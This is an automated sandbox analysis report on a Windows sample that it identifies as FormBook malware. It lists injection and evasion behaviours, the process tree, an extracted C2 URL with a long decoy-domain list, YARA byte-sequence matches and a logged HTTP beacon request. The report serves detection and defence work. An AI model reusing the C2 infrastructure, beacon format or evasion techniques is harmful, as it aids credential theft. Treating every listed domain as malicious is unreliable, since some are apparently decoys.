Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report New_1007572_021.exe

Overview

General Information

Sample Name:New_1007572_021.exe
Analysis ID:458848
MD5:41137fd61b9cc0d92225c91660a5902c
SHA1:15d023fd6d344cb18243469a3ee01fea6bb189af
SHA256:b04306fa8223c20a1abaaa6aeb5cabb2a83dc04337beb2acfd47784b34b682bc
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • New_1007572_021.exe (PID: 6688 cmdline: 'C:\Users\user\Desktop\New_1007572_021.exe' MD5: 41137FD61B9CC0D92225C91660A5902C)
    • New_1007572_021.exe (PID: 6280 cmdline: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
      • FB_5908.tmp.exe (PID: 6340 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe' MD5: 74BAFB3E707C7B0C63938AC200F99C7F)
      • FB_5E87.tmp.exe (PID: 6344 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe' MD5: 48ECE2CA39A9EAE7FCED7418CF071D46)
        • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cscript.exe (PID: 6000 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
            • cmd.exe (PID: 6872 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeJoeSecurity_FormBookYara detected FormBookJoe Security
    C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0xa11c:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa386:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15ea9:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15995:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15fab:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x16123:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xad9e:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x14c10:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xba97:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1bd1b:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1cd1e:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18c3d:$sqlite3step: 68 34 1C 7B E1
      • 0x18d50:$sqlite3step: 68 34 1C 7B E1
      • 0x18c6c:$sqlite3text: 68 38 2A 90 C5
      • 0x18d91:$sqlite3text: 68 38 2A 90 C5
      • 0x18c7f:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18da7:$sqlite3blob: 68 53 D8 7F 8C
      00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0xa040:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0xa2aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15dcd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x158b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15ecf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x16047:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xacc2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x14b34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb9bb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1bc3f:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1cc42:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 34 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.New_1007572_021.exe.3eb8b30.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.New_1007572_021.exe.3eb8b30.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0xe5c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xe82a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x1a34d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x19e39:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x1a44f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1a5c7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xf242:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x190b4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xff3b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x201bf:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x211c2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.New_1007572_021.exe.3eb8b30.6.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x1d0e1:$sqlite3step: 68 34 1C 7B E1
          • 0x1d1f4:$sqlite3step: 68 34 1C 7B E1
          • 0x1d110:$sqlite3text: 68 38 2A 90 C5
          • 0x1d235:$sqlite3text: 68 38 2A 90 C5
          • 0x1d123:$sqlite3blob: 68 53 D8 7F 8C
          • 0x1d24b:$sqlite3blob: 68 53 D8 7F 8C
          10.2.FB_5E87.tmp.exe.1080000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            10.2.FB_5E87.tmp.exe.1080000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 16 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
            Found malware configurationShow sources
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeMetadefender: Detection: 45%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeReversingLabs: Detection: 85%
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeReversingLabs: Detection: 28%
            Multi AV Scanner detection for submitted fileShow sources
            Source: New_1007572_021.exeReversingLabs: Detection: 28%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: New_1007572_021.exeJoe Sandbox ML: detected
            Source: 0.2.New_1007572_021.exe.2d49d5c.1.unpackAvira: Label: TR/Dropper.Gen
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpackAvira: Label: TR/Crypt.XPACK.Gen2
            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 8.2.New_1007572_021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: New_1007572_021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: New_1007572_021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe, 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 4x nop then pop esi10_2_0109727D
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 4x nop then pop edi10_2_01097D7B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi19_2_031C727D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi19_2_031C7D7B

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.domoexpra.club/cg53/
            Source: global trafficHTTP traffic detected: GET /cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h HTTP/1.1Host: www.comfsresidential.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
            Source: global trafficHTTP traffic detected: GET /cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h HTTP/1.1Host: www.comfsresidential.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.comfsresidential.com
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000000B.00000000.785548112.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: New_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: New_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.come.comE
            Source: New_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comiona
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: New_1007572_021.exe, 00000000.00000002.737740321.00000000010B0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
